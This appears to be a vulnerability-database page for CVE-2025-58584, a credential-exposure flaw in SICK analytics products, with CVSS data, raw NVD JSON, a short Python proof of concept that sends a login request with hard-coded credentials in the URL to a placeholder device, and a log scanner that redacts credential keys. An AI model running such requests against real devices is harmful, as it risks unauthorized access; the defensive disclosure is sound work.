Security Vulnerability Report
CVE-2025-58584 CVSS 5.3 MEDIUM

CVE-2025-58584

Published: 2025-10-06 07:15:35
Last Modified: 2026-01-27 16:13:13

Description

In the HTTP request, the username and password are transferred directly in the URL as parameters. However, URLs can be stored in various systems such as server logs, browser histories or proxy servers. As a result, there is a high risk that this sensitive data will be disclosed unintentionally.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Weakness: CWE-598 (Use of GET Request Method With Sensitive Query Strings)

The NVD record also carries a second, Primary CVSS 3.1 assessment of 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N); the two vectors differ only in the confidentiality impact (Low versus High).

Configurations (Affected Products)

cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:* - VULNERABLE
SICK industrial automation products (for the specific affected versions, see the official SCA-2025-0010 advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-58584 PoC - Credential Exposure via URL Parameters
# This PoC demonstrates how credentials are transmitted in URL parameters
# in SICK products, leading to potential credential exposure
import requests
from urllib.parse import urlencode

# Target SICK device (replace with actual target)
target_host = "http://192.168.1.100"
target_port = 80

# Vulnerable endpoint - credentials passed as URL parameters (INSECURE)
username = "admin"
password = "Admin123!"

# Construct the vulnerable URL with credentials in the query string
# (urlencode percent-encodes the values so the request is well-formed)
query = urlencode({"username": username, "password": password})
vulnerable_url = f"{target_host}:{target_port}/api/login?{query}"

print("[*] Sending authentication request with credentials in URL...")
print(f"[*] Vulnerable URL: {vulnerable_url}")
print("[!] WARNING: Credentials are visible in URL - will be logged!")

try:
    # The vulnerable request - credentials in URL
    response = requests.get(vulnerable_url, timeout=10)
    print(f"[*] Response Status: {response.status_code}")
    print(f"[*] Response Body: {response.text[:500]}")

    # Demonstration of credential exposure in server logs
    print("\n[*] Simulating server log entry that would expose credentials:")
    log_entry = (
        "192.168.1.50 - - [06/Oct/2025:10:15:30 +0000] "
        f'"GET /api/login?{query} HTTP/1.1" 200 1234'
    )
    print(f"    {log_entry}")
    print("[!] Credentials are now permanently stored in server access logs!")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Secure alternative - using POST with body (recommended fix)
print("\n[*] Secure authentication should use POST method:")
try:
    secure_response = requests.post(
        f"{target_host}:{target_port}/api/login",
        json={"username": username, "password": password},
        timeout=10,
    )
    print(f"[*] Secure Response Status: {secure_response.status_code}")
    print("[*] Credentials are NOT visible in URL or logs with POST method")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")
```
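The PoC above shows the client side of CWE-598; the following is an added example (not from the advisory or from SICK) of the defender's side: a scanner that parses Common Log Format access-log lines, flags requests whose query string carries credential-like keys, and produces a redacted copy so the log can be retained without the secrets. The sample log lines and the list of sensitive key names are constructed for the example.

```python
# Added example, not from the SICK advisory: find and redact credentials that reached
# web-server access logs because a client sent them as URL query parameters (CWE-598).
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Query keys that should never travel in a URL (assumed list; extend per application)
SENSITIVE_KEYS = {"password", "passwd", "pwd", "pass", "secret", "token", "apikey", "api_key"}

# Common Log Format: host ident user [time] "METHOD path HTTP/x" status bytes
CLF_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (HTTP/[\d.]+)" (\d{3}) (\S+)$'
)

# Constructed sample lines; the first mirrors the entry simulated in the PoC above
LOG_LINES = [
    '192.168.1.50 - - [06/Oct/2025:10:15:30 +0000] "GET /api/login?username=admin&password=Admin123! HTTP/1.1" 200 1234',
    '192.168.1.51 - - [06/Oct/2025:10:16:02 +0000] "GET /api/status?verbose=1 HTTP/1.1" 200 88',
    '192.168.1.52 - - [06/Oct/2025:10:17:45 +0000] "POST /api/login HTTP/1.1" 200 1234',
]


def redact_url(url: str) -> tuple[str, list[str]]:
    """Replace the value of every sensitive query key with REDACTED.
    Returns the cleaned URL and the sensitive keys that were present."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    found = [k for k, _ in pairs if k.lower() in SENSITIVE_KEYS]
    if not found:
        return url, []
    cleaned = [(k, "REDACTED" if k.lower() in SENSITIVE_KEYS else v) for k, v in pairs]
    return urlunsplit(parts._replace(query=urlencode(cleaned))), found


def scan_log(lines):
    """One finding per CLF line whose request URL carries a sensitive key: the
    client IP, the keys seen and a redacted copy of the line that is safe to keep.
    Lines that do not parse as CLF are skipped."""
    findings = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, proto, status, size = m.groups()
        redacted, keys = redact_url(path)
        if keys:
            findings.append({
                "client": ip, "method": method, "keys": keys,
                "redacted": f'{ip} - - [{ts}] "{method} {redacted} {proto}" {status} {size}',
            })
    return findings
```

Running `scan_log` over a real access log gives both a detection signal (which clients and endpoints leak credentials) and a sanitised line to replace the original before the log is shipped or archived.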

References

https://sick.com/psirt (Vendor Advisory)
https://www.cisa.gov/resources-tools/resources/ics-recommended-practices (US Government Resource)
https://www.first.org/cvss/calculator/3.1 (Not Applicable)
https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json (Vendor Advisory)
https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf (Vendor Advisory)
https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf (Product)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-58584",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-06T07:15:35.063",
    "lastModified": "2026-01-27T16:13:13.000",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In the HTTP request, the username and password are transferred directly in the URL as parameters. However, URLs can be stored in various systems such as server logs, browser histories or proxy servers. As a result, there is a high risk that this sensitive data will be disclosed unintentionally."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-598"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:*",
                "matchCriteriaId": "E62416BA-1BF1-43BD-98B2-57BD34128419"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:*",
                "matchCriteriaId": "04E8EA78-2780-40C0-B5BA-6CF99DE6355B"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:*",
                "matchCriteriaId": "27031959-2981-4755-9E3D-02CD083F2B72"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:*",
                "matchCriteriaId": "5955214B-0D71-449A-BFD4-8804FDF91CA1"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:*",
                "matchCriteriaId": "86C0BA69-E701-45A3-ADA5-130B8AD9DF15"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://sick.com/psirt",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices",
        "source": "[email protected]",
        "tags": ["US Government Resource"]
      },
      {
        "url": "https://www.first.org/cvss/calculator/3.1",
        "source": "[email protected]",
        "tags": ["Not Applicable"]
      },
      {
        "url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}
```